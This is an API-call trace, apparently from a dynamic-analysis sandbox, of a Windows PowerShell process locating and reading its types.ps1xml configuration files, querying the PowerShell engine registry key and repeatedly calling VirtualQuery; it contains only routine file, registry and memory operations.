	[0053.555] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2011c38 | out: lpFileInformation=0x2011c38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0058e2, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a0058e2, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd7bbaefc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0053.555] GetLastError () returned 0x0
	[0053.555] SetErrorMode (uMode=0x1) returned 0x1
	[0053.556] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x22dec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0053.556] GetLastError () returned 0x0
	[0053.556] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e318 | out: phkResult=0x22e318*=0x330) returned 0x0
	[0053.556] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22e360, lpData=0x0, lpcbData=0x22e35c*=0x0 | out: lpType=0x22e360*=0x1, lpData=0x0, lpcbData=0x22e35c*=0x56) returned 0x0
	[0053.556] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22e360, lpData=0x3c3520, lpcbData=0x22e35c*=0x56 | out: lpType=0x22e360*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x22e35c*=0x56) returned 0x0
	[0053.557] RegCloseKey (hKey=0x330) returned 0x0
	[0053.557] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x22dec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0053.557] GetLastError () returned 0x0
	[0053.557] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x22de54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0053.557] GetLastError () returned 0x0
	[0053.686] GetSystemInfo (in: lpSystemInfo=0x22da98 | out: lpSystemInfo=0x22da98*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x4f01)) 
	[0053.687] VirtualQuery (in: lpAddress=0x22d254, lpBuffer=0x22e254, dwLength=0x1c | out: lpBuffer=0x22e254*(BaseAddress=0x22d000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0053.743] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x22de2c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0053.743] GetLastError () returned 0x0
	[0053.743] SetErrorMode (uMode=0x1) returned 0x1
	[0053.743] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x330
	[0053.743] GetLastError () returned 0x0
	[0053.743] GetFileType (hFile=0x330) returned 0x1
	[0053.743] SetErrorMode (uMode=0x1) returned 0x1
	[0053.743] GetFileType (hFile=0x330) returned 0x1
	[0053.743] ReadFile (in: hFile=0x330, lpBuffer=0x2046054, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e394, lpOverlapped=0x0 | out: lpBuffer=0x2046054*, lpNumberOfBytesRead=0x22e394*=0x1000, lpOverlapped=0x0) returned 1
	[0053.744] GetLastError () returned 0x0
	[0053.744] ReadFile (in: hFile=0x330, lpBuffer=0x2046054, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e394, lpOverlapped=0x0 | out: lpBuffer=0x2046054*, lpNumberOfBytesRead=0x22e394*=0x1000, lpOverlapped=0x0) returned 1
	[0053.744] GetLastError () returned 0x0
	[0053.745] ReadFile (in: hFile=0x330, lpBuffer=0x2046054, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e394, lpOverlapped=0x0 | out: lpBuffer=0x2046054*, lpNumberOfBytesRead=0x22e394*=0x1000, lpOverlapped=0x0) returned 1
	[0053.745] GetLastError () returned 0x0
	[0053.745] ReadFile (in: hFile=0x330, lpBuffer=0x2046054, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e394, lpOverlapped=0x0 | out: lpBuffer=0x2046054*, lpNumberOfBytesRead=0x22e394*=0x1000, lpOverlapped=0x0) returned 1
	[0053.745] GetLastError () returned 0x0
	[0053.745] ReadFile (in: hFile=0x330, lpBuffer=0x2046054, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e394, lpOverlapped=0x0 | out: lpBuffer=0x2046054*, lpNumberOfBytesRead=0x22e394*=0x1000, lpOverlapped=0x0) returned 1
	[0053.745] GetLastError () returned 0x0
	[0053.746] ReadFile (in: hFile=0x330, lpBuffer=0x2046054, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e394, lpOverlapped=0x0 | out: lpBuffer=0x2046054*, lpNumberOfBytesRead=0x22e394*=0x1000, lpOverlapped=0x0) returned 1
	[0053.747] GetLastError () returned 0x0
	[0053.747] ReadFile (in: hFile=0x330, lpBuffer=0x2046054, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e394, lpOverlapped=0x0 | out: lpBuffer=0x2046054*, lpNumberOfBytesRead=0x22e394*=0x1000, lpOverlapped=0x0) returned 1
	[0053.747] GetLastError () returned 0x0
	[0053.747] ReadFile (in: hFile=0x330, lpBuffer=0x2046054, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e394, lpOverlapped=0x0 | out: lpBuffer=0x2046054*, lpNumberOfBytesRead=0x22e394*=0x1000, lpOverlapped=0x0) returned 1
	[0053.747] GetLastError () returned 0x0
	[0053.747] ReadFile (in: hFile=0x330, lpBuffer=0x2046054, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e394, lpOverlapped=0x0 | out: lpBuffer=0x2046054*, lpNumberOfBytesRead=0x22e394*=0x1000, lpOverlapped=0x0) returned 1
	[0053.747] GetLastError () returned 0x0
	[0053.748] ReadFile (in: hFile=0x330, lpBuffer=0x2046054, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e394, lpOverlapped=0x0 | out: lpBuffer=0x2046054*, lpNumberOfBytesRead=0x22e394*=0x1000, lpOverlapped=0x0) returned 1
	[0053.748] GetLastError () returned 0x0
	[0053.748] ReadFile (in: hFile=0x330, lpBuffer=0x2046054, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e394, lpOverlapped=0x0 | out: lpBuffer=0x2046054*, lpNumberOfBytesRead=0x22e394*=0x1000, lpOverlapped=0x0) returned 1
	[0053.748] GetLastError () returned 0x0
	[0053.748] ReadFile (in: hFile=0x330, lpBuffer=0x2046054, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e394, lpOverlapped=0x0 | out: lpBuffer=0x2046054*, lpNumberOfBytesRead=0x22e394*=0x1000, lpOverlapped=0x0) returned 1
	[0053.748] GetLastError () returned 0x0
	[0053.749] ReadFile (in: hFile=0x330, lpBuffer=0x2046054, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e394, lpOverlapped=0x0 | out: lpBuffer=0x2046054*, lpNumberOfBytesRead=0x22e394*=0x1000, lpOverlapped=0x0) returned 1
	[0053.749] GetLastError () returned 0x0
	[0053.749] ReadFile (in: hFile=0x330, lpBuffer=0x2046054, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e394, lpOverlapped=0x0 | out: lpBuffer=0x2046054*, lpNumberOfBytesRead=0x22e394*=0x1000, lpOverlapped=0x0) returned 1
	[0053.749] GetLastError () returned 0x0
	[0053.749] ReadFile (in: hFile=0x330, lpBuffer=0x2046054, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e394, lpOverlapped=0x0 | out: lpBuffer=0x2046054*, lpNumberOfBytesRead=0x22e394*=0x1000, lpOverlapped=0x0) returned 1
	[0053.749] GetLastError () returned 0x0
	[0053.749] ReadFile (in: hFile=0x330, lpBuffer=0x2046054, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e394, lpOverlapped=0x0 | out: lpBuffer=0x2046054*, lpNumberOfBytesRead=0x22e394*=0x1000, lpOverlapped=0x0) returned 1
	[0053.749] GetLastError () returned 0x0
	[0053.749] ReadFile (in: hFile=0x330, lpBuffer=0x2046054, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e394, lpOverlapped=0x0 | out: lpBuffer=0x2046054*, lpNumberOfBytesRead=0x22e394*=0x1000, lpOverlapped=0x0) returned 1
	[0053.750] GetLastError () returned 0x0
	[0053.752] ReadFile (in: hFile=0x330, lpBuffer=0x2046054, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e394, lpOverlapped=0x0 | out: lpBuffer=0x2046054*, lpNumberOfBytesRead=0x22e394*=0x1000, lpOverlapped=0x0) returned 1
	[0053.752] GetLastError () returned 0x0
	[0053.752] ReadFile (in: hFile=0x330, lpBuffer=0x2046054, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e394, lpOverlapped=0x0 | out: lpBuffer=0x2046054*, lpNumberOfBytesRead=0x22e394*=0x1000, lpOverlapped=0x0) returned 1
	[0053.752] GetLastError () returned 0x0
	[0053.752] ReadFile (in: hFile=0x330, lpBuffer=0x2046054, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e394, lpOverlapped=0x0 | out: lpBuffer=0x2046054*, lpNumberOfBytesRead=0x22e394*=0x1000, lpOverlapped=0x0) returned 1
	[0053.752] GetLastError () returned 0x0
	[0053.752] ReadFile (in: hFile=0x330, lpBuffer=0x2046054, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e394, lpOverlapped=0x0 | out: lpBuffer=0x2046054*, lpNumberOfBytesRead=0x22e394*=0x1000, lpOverlapped=0x0) returned 1
	[0053.752] GetLastError () returned 0x0
	[0053.753] ReadFile (in: hFile=0x330, lpBuffer=0x2046054, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e394, lpOverlapped=0x0 | out: lpBuffer=0x2046054*, lpNumberOfBytesRead=0x22e394*=0x1000, lpOverlapped=0x0) returned 1
	[0053.753] GetLastError () returned 0x0
	[0053.753] ReadFile (in: hFile=0x330, lpBuffer=0x2046054, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e394, lpOverlapped=0x0 | out: lpBuffer=0x2046054*, lpNumberOfBytesRead=0x22e394*=0x1000, lpOverlapped=0x0) returned 1
	[0053.753] GetLastError () returned 0x0
	[0053.753] ReadFile (in: hFile=0x330, lpBuffer=0x2046054, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e394, lpOverlapped=0x0 | out: lpBuffer=0x2046054*, lpNumberOfBytesRead=0x22e394*=0x1000, lpOverlapped=0x0) returned 1
	[0053.753] GetLastError () returned 0x0
	[0053.753] ReadFile (in: hFile=0x330, lpBuffer=0x2046054, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e394, lpOverlapped=0x0 | out: lpBuffer=0x2046054*, lpNumberOfBytesRead=0x22e394*=0x1000, lpOverlapped=0x0) returned 1
	[0053.753] GetLastError () returned 0x0
	[0053.753] ReadFile (in: hFile=0x330, lpBuffer=0x2046054, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e394, lpOverlapped=0x0 | out: lpBuffer=0x2046054*, lpNumberOfBytesRead=0x22e394*=0x1000, lpOverlapped=0x0) returned 1
	[0053.754] GetLastError () returned 0x0
	[0053.754] ReadFile (in: hFile=0x330, lpBuffer=0x2046054, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e394, lpOverlapped=0x0 | out: lpBuffer=0x2046054*, lpNumberOfBytesRead=0x22e394*=0x1000, lpOverlapped=0x0) returned 1
	[0053.754] GetLastError () returned 0x0
	[0053.754] ReadFile (in: hFile=0x330, lpBuffer=0x2046054, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e394, lpOverlapped=0x0 | out: lpBuffer=0x2046054*, lpNumberOfBytesRead=0x22e394*=0x1000, lpOverlapped=0x0) returned 1
	[0053.754] GetLastError () returned 0x0
	[0053.754] ReadFile (in: hFile=0x330, lpBuffer=0x2046054, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e394, lpOverlapped=0x0 | out: lpBuffer=0x2046054*, lpNumberOfBytesRead=0x22e394*=0x1000, lpOverlapped=0x0) returned 1
	[0053.754] GetLastError () returned 0x0
	[0053.754] ReadFile (in: hFile=0x330, lpBuffer=0x2046054, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e394, lpOverlapped=0x0 | out: lpBuffer=0x2046054*, lpNumberOfBytesRead=0x22e394*=0x1000, lpOverlapped=0x0) returned 1
	[0053.754] GetLastError () returned 0x0
	[0053.755] ReadFile (in: hFile=0x330, lpBuffer=0x2046054, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e394, lpOverlapped=0x0 | out: lpBuffer=0x2046054*, lpNumberOfBytesRead=0x22e394*=0x1000, lpOverlapped=0x0) returned 1
	[0053.755] GetLastError () returned 0x0
	[0053.755] ReadFile (in: hFile=0x330, lpBuffer=0x2046054, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e394, lpOverlapped=0x0 | out: lpBuffer=0x2046054*, lpNumberOfBytesRead=0x22e394*=0x1000, lpOverlapped=0x0) returned 1
	[0053.755] GetLastError () returned 0x0
	[0053.755] ReadFile (in: hFile=0x330, lpBuffer=0x2046054, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e394, lpOverlapped=0x0 | out: lpBuffer=0x2046054*, lpNumberOfBytesRead=0x22e394*=0x1000, lpOverlapped=0x0) returned 1
	[0053.755] GetLastError () returned 0x0
	[0053.760] ReadFile (in: hFile=0x330, lpBuffer=0x2046054, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e394, lpOverlapped=0x0 | out: lpBuffer=0x2046054*, lpNumberOfBytesRead=0x22e394*=0x1000, lpOverlapped=0x0) returned 1
	[0053.760] GetLastError () returned 0x0
	[0053.760] ReadFile (in: hFile=0x330, lpBuffer=0x2046054, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e394, lpOverlapped=0x0 | out: lpBuffer=0x2046054*, lpNumberOfBytesRead=0x22e394*=0x1000, lpOverlapped=0x0) returned 1
	[0053.760] GetLastError () returned 0x0
	[0053.760] ReadFile (in: hFile=0x330, lpBuffer=0x2046054, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e394, lpOverlapped=0x0 | out: lpBuffer=0x2046054*, lpNumberOfBytesRead=0x22e394*=0x1000, lpOverlapped=0x0) returned 1
	[0053.760] GetLastError () returned 0x0
	[0053.760] ReadFile (in: hFile=0x330, lpBuffer=0x2046054, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e394, lpOverlapped=0x0 | out: lpBuffer=0x2046054*, lpNumberOfBytesRead=0x22e394*=0x1000, lpOverlapped=0x0) returned 1
	[0053.760] GetLastError () returned 0x0
	[0053.761] ReadFile (in: hFile=0x330, lpBuffer=0x2046054, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e394, lpOverlapped=0x0 | out: lpBuffer=0x2046054*, lpNumberOfBytesRead=0x22e394*=0x1000, lpOverlapped=0x0) returned 1
	[0053.761] GetLastError () returned 0x0
	[0053.761] ReadFile (in: hFile=0x330, lpBuffer=0x2046054, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e394, lpOverlapped=0x0 | out: lpBuffer=0x2046054*, lpNumberOfBytesRead=0x22e394*=0x1000, lpOverlapped=0x0) returned 1
	[0053.761] GetLastError () returned 0x0
	[0053.761] ReadFile (in: hFile=0x330, lpBuffer=0x2046054, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e394, lpOverlapped=0x0 | out: lpBuffer=0x2046054*, lpNumberOfBytesRead=0x22e394*=0x1000, lpOverlapped=0x0) returned 1
	[0053.761] GetLastError () returned 0x0
	[0053.761] ReadFile (in: hFile=0x330, lpBuffer=0x2046054, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e394, lpOverlapped=0x0 | out: lpBuffer=0x2046054*, lpNumberOfBytesRead=0x22e394*=0x1000, lpOverlapped=0x0) returned 1
	[0053.761] GetLastError () returned 0x0
	[0053.762] ReadFile (in: hFile=0x330, lpBuffer=0x2046054, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e394, lpOverlapped=0x0 | out: lpBuffer=0x2046054*, lpNumberOfBytesRead=0x22e394*=0x1b4, lpOverlapped=0x0) returned 1
	[0053.762] GetLastError () returned 0x0
	[0053.762] ReadFile (in: hFile=0x330, lpBuffer=0x2046054, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e394, lpOverlapped=0x0 | out: lpBuffer=0x2046054*, lpNumberOfBytesRead=0x22e394*=0x0, lpOverlapped=0x0) returned 1
	[0053.762] GetLastError () returned 0x0
	[0053.762] CloseHandle (hObject=0x330) returned 1
	[0053.762] GetLastError () returned 0x0
	[0053.762] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x22def4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0053.762] GetLastError () returned 0x0
	[0053.762] SetErrorMode (uMode=0x1) returned 0x1
	[0053.762] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x20668e4 | out: lpFileInformation=0x20668e4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7c2d31c, ftCreationTime.dwHighDateTime=0x1c9ea11, ftLastAccessTime.dwLowDateTime=0xd7c2d31c, ftLastAccessTime.dwHighDateTime=0x1c9ea11, ftLastWriteTime.dwLowDateTime=0xd7c5347c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0053.762] GetLastError () returned 0x0
	[0053.762] SetErrorMode (uMode=0x1) returned 0x1
	[0053.762] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x22dec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0053.762] GetLastError () returned 0x0
	[0053.762] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e318 | out: phkResult=0x22e318*=0x330) returned 0x0
	[0053.762] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22e360, lpData=0x0, lpcbData=0x22e35c*=0x0 | out: lpType=0x22e360*=0x1, lpData=0x0, lpcbData=0x22e35c*=0x56) returned 0x0
	[0053.762] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22e360, lpData=0x3c3520, lpcbData=0x22e35c*=0x56 | out: lpType=0x22e360*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x22e35c*=0x56) returned 0x0
	[0053.763] RegCloseKey (hKey=0x330) returned 0x0
	[0053.763] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x22dec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0053.763] GetLastError () returned 0x0
	[0053.763] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x22de54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0053.763] GetLastError () returned 0x0
	[0053.946] VirtualQuery (in: lpAddress=0x22d254, lpBuffer=0x22e254, dwLength=0x1c | out: lpBuffer=0x22e254*(BaseAddress=0x22d000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0053.973] VirtualQuery (in: lpAddress=0x22d254, lpBuffer=0x22e254, dwLength=0x1c | out: lpBuffer=0x22e254*(BaseAddress=0x22d000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0053.975] VirtualQuery (in: lpAddress=0x22d254, lpBuffer=0x22e254, dwLength=0x1c | out: lpBuffer=0x22e254*(BaseAddress=0x22d000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0053.975] VirtualQuery (in: lpAddress=0x22d254, lpBuffer=0x22e254, dwLength=0x1c | out: lpBuffer=0x22e254*(BaseAddress=0x22d000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0053.976] VirtualQuery (in: lpAddress=0x22d254, lpBuffer=0x22e254, dwLength=0x1c | out: lpBuffer=0x22e254*(BaseAddress=0x22d000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0053.976] VirtualQuery (in: lpAddress=0x22d254, lpBuffer=0x22e254, dwLength=0x1c | out: lpBuffer=0x22e254*(BaseAddress=0x22d000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.015] VirtualQuery (in: lpAddress=0x22d254, lpBuffer=0x22e254, dwLength=0x1c | out: lpBuffer=0x22e254*(BaseAddress=0x22d000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.019] VirtualQuery (in: lpAddress=0x22d254, lpBuffer=0x22e254, dwLength=0x1c | out: lpBuffer=0x22e254*(BaseAddress=0x22d000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.033] VirtualQuery (in: lpAddress=0x22d254, lpBuffer=0x22e254, dwLength=0x1c | out: lpBuffer=0x22e254*(BaseAddress=0x22d000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.033] VirtualQuery (in: lpAddress=0x22d254, lpBuffer=0x22e254, dwLength=0x1c | out: lpBuffer=0x22e254*(BaseAddress=0x22d000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.033] VirtualQuery (in: lpAddress=0x22d254, lpBuffer=0x22e254, dwLength=0x1c | out: lpBuffer=0x22e254*(BaseAddress=0x22d000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.034] VirtualQuery (in: lpAddress=0x22d254, lpBuffer=0x22e254, dwLength=0x1c | out: lpBuffer=0x22e254*(BaseAddress=0x22d000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.034] VirtualQuery (in: lpAddress=0x22d254, lpBuffer=0x22e254, dwLength=0x1c | out: lpBuffer=0x22e254*(BaseAddress=0x22d000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.034] VirtualQuery (in: lpAddress=0x22d254, lpBuffer=0x22e254, dwLength=0x1c | out: lpBuffer=0x22e254*(BaseAddress=0x22d000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.035] VirtualQuery (in: lpAddress=0x22d254, lpBuffer=0x22e254, dwLength=0x1c | out: lpBuffer=0x22e254*(BaseAddress=0x22d000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.035] VirtualQuery (in: lpAddress=0x22d254, lpBuffer=0x22e254, dwLength=0x1c | out: lpBuffer=0x22e254*(BaseAddress=0x22d000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.040] VirtualQuery (in: lpAddress=0x22d254, lpBuffer=0x22e254, dwLength=0x1c | out: lpBuffer=0x22e254*(BaseAddress=0x22d000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.046] VirtualQuery (in: lpAddress=0x22d254, lpBuffer=0x22e254, dwLength=0x1c | out: lpBuffer=0x22e254*(BaseAddress=0x22d000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.046] VirtualQuery (in: lpAddress=0x22d254, lpBuffer=0x22e254, dwLength=0x1c | out: lpBuffer=0x22e254*(BaseAddress=0x22d000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.048] VirtualQuery (in: lpAddress=0x22d254, lpBuffer=0x22e254, dwLength=0x1c | out: lpBuffer=0x22e254*(BaseAddress=0x22d000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.048] VirtualQuery (in: lpAddress=0x22d254, lpBuffer=0x22e254, dwLength=0x1c | out: lpBuffer=0x22e254*(BaseAddress=0x22d000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.049] VirtualQuery (in: lpAddress=0x22d254, lpBuffer=0x22e254, dwLength=0x1c | out: lpBuffer=0x22e254*(BaseAddress=0x22d000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.050] VirtualQuery (in: lpAddress=0x22d254, lpBuffer=0x22e254, dwLength=0x1c | out: lpBuffer=0x22e254*(BaseAddress=0x22d000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.050] VirtualQuery (in: lpAddress=0x22d254, lpBuffer=0x22e254, dwLength=0x1c | out: lpBuffer=0x22e254*(BaseAddress=0x22d000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.050] VirtualQuery (in: lpAddress=0x22d254, lpBuffer=0x22e254, dwLength=0x1c | out: lpBuffer=0x22e254*(BaseAddress=0x22d000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
